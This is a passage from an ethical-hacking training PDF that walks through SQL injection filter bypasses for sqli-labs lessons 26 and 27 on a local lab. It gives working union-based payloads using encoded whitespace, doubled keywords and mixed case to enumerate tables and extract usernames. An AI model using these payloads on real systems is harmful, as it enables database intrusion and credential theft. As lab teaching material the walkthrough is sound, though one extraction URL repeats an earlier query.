From screenshot you can see we have successfully fixed the query for SPACE into URL encode as %a0
Blanks = (‘%09’, ‘%0A’, ‘%0C’, ‘%0D’, ‘%0B’ ‘%a0’)

www.hackingarticles.in Page | 71
Once the concept is clear to bypass AND, OR and SPACE filter later we need to alter the SQL statement
for retrieving database information.

http://localhost:81/sqli/Less-
26/?id=0'%a0union%a0select%a01,2,3%
a0%26%26'1=1

www.hackingarticles.in Page | 72
Type following query to retrieve database name using union injection.

http://localhost:81/sqli/Less-
26/?id=0'%a0union%a0select%a01,database(),3
%a0%26%26%'1=1

Hence you can see we have successfully get security as database name as a result

Next query will provide entire table names saved inside the database.

http://localhost:81/sqli/Less-
26/?id=0'%a0union%a0select%a01,group_concat(table
_name),3%a0from%a0infoorrmation_schema.tables%a0w
here%a0table_schema=database()%a0%26%26'1=1

www.hackingarticles.in Page | 73
From the screenshot you can read the following table names:

T1: emails
T2: referers
T3: uagents
T4: users

Now we’ll try to find out column names of users table using the following query.

http://localhost:81/sqli/Less-
26/?id=0'%a0union%a0select%a01,group_concat(co
lumn_name),3%a0from%a0infoorrmation_schema.col
umns%a0where%a0table_name='users'%a0%26%26'1=1

www.hackingarticles.in Page | 74
Hence you can see columns inside it.

C1: id
C2: username
C3: password

www.hackingarticles.in Page | 75
At last, execute the following query to read all username inside the table users from inside its column.
From the screenshot, you can read the fetched data.

http://localhost:81/sqli/Less-
26/?id=0'%a0union%a0select%a01,group_concat
(username),3%a0from%a0users%a0where%a01%26%
26%a0'1

Hence, we have learned how to bypass AND, OR, SPACE AND COMMENT filter for retrieving
information from the database.

www.hackingarticles.in Page | 76
You will find this lab even more challenging because here UNION/union, SELECT/select, SPACE and
Comments are Blocked so now we will try to bypass SQL filter using their substitute.
Following are function blacklist($id)
$id= preg_replace(‘/[\/\*]/’,””, $id); //strip out /*
$id= preg_replace(‘/[–]/’,””, $id); //Strip out –.
$id= preg_replace(‘/[#]/’,””, $id); //Strip out #.
$id= preg_replace(‘/[ +]/’,””, $id); //Strip out spaces.
$id= preg_replace(‘/select/m’,””, $id); //Strip out spaces.
$id= preg_replace(‘/[ +]/’,””, $id); //Strip out spaces.
$id= preg_replace(‘/union/s’,””, $id); //Strip out union
$id= preg_replace(‘/select/s’,””, $id); //Strip out select
$id= preg_replace(‘/UNION/s’,””, $id); //Strip out UNION
$id= preg_replace(‘/SELECT/s’,””, $id); //Strip out SELECT
$id= preg_replace(‘/Union/s’,””, $id); //Strip out Union
$id= preg_replace(‘/Select/s’,””, $id); //Strip out select
This lab has more filters in addtion to lab 26 because here union, select, space andComments are also
Blocked. Now execute following query In URL .

http://localhost:81/sqli/Less
-27/?id=1' AND'1=1

Once the concept is clear to bypass UNION/union, SELECT/select and SPACE filter later we need to
alter the SQL statement for retrieving database information.

http://localhost:81/sqli/Less-
27/?id=1'%a0UnIon%a0SeLect%a01,
2,3%a0AND'1=1

In the screenshot, you can see I have use union as UnIon and select as SeLect in the query to bypass
the filter.

www.hackingarticles.in Page | 77
Once the concept is clear to bypass UNION/union, SELECT/select and SPACE filter later we need to
alter the SQL statement for retrieving database information.
http://localhost:81/sqli/Less-
27/?id=1'%a0UnIon%a0SeLect%a01,
2,3%a0AND'1=1

In the screenshot, you can see I have use union as UnIon and select as SeLect in the query to bypass
the filter.

www.hackingarticles.in Page | 78
Now Type the following query to retrieve database name using union injection.

http://localhost:81/sqli/Less-
27/?id=0'%a0UnIon%a0SeLect%a01,database()
,3%a0AND'1=1

Hence you can see we have successfully get security as a database name as a result

www.hackingarticles.in Page | 79
Next query will provide entire table names saved inside the database.

http://localhost:81/sqli/Less-
27/?id=0'%a0UnIon%a0SeLect%a01,group_concat(ta
ble_name),3%a0from%a0information_schema.tables
%a0where%a0table_schema=database()%a0AND'1=1

From the screenshot you can read the following table names:

T1: emails
T2: referers
T3: uagents
T4: users

www.hackingarticles.in Page | 80
Now we’ll try to find out column names of users table using the following query.

http://localhost:81/sqli/Less-
27/?id=0'%a0UnIon%a0SeLect%a01,group_concat(c
olumn_name),3%a0from%a0information_schema.col
umns%a0where%a0table_name='users'%a0AND'1=1

Hence you can see columns inside it.

C1: id
C2: username
C3: password

www.hackingarticles.in Page | 81
At last, execute the following query to read all username inside the table users from inside its column.
From the screenshot, you can read the fetched data.

http://localhost:81//sqli/Less-
27/?id=0'%a0UnIon%a0SeLect%a01,group_concat(column
_name),3%a0from%a0information_schema.columns%a0whe
re%a0table_name='users'%a0AND'1=1

Hence, we have learned how to bypass UNION/union, SELECT/select, SPACE and COMMENT filter for
retrieving information inside the database.

www.hackingarticles.in Page | 82
www.hackingarticles.in Page | 83
About Us
“Simple training makes Deep Learning”

“IGNITE” is a worldwide name in IT field. As we provide high-quality cybersecurity training and


consulting services that fulfil students, government and corporate requirements.
We are working towards the vision to “Develop India as a Cyber Secured Country”. With an outreach
to over eighty thousand students and over a thousand major colleges, Ignite Technologies stood out
to be a trusted brand in the Education and the Information Security structure.

We provide training and education in the field of Ethical Hacking & Information Security to the
students of schools and colleges along with the corporate world. The training can be provided at the
client’s location or even at Ignite’s Training Center.
We have trained over 10,000 + individuals across the globe, ranging from students to security experts
from different fields. Our trainers are acknowledged as Security Researcher by the Top Companies like
- Facebook, Google, Microsoft, Adobe, Nokia, Paypal, Blackberry, AT&T and many more. Even the
trained students are placed into a number of top MNC's all around the globe. Over with this, we are
having International experience of training more than 400+ individuals.

The two brands, Ignite Technologies & Hacking Articles have been collaboratively working from past
10+ Years with about more than 100+ security researchers, who themselves have been recognized by
several research paper publishing organizations, The Big 4 companies, Bug Bounty research programs
and many more.

Along with all these things, all the major certification organizations recommend Ignite's training for its
resources and guidance.
Ignite's research had been a part of number of global Institutes and colleges, and even a multitude of
research papers shares Ignite's researchers in their reference.

www.hackingarticles.in Page | 84
www.hackingarticles.in Page | 85
www.hackingarticles.in Page | 86

You might also like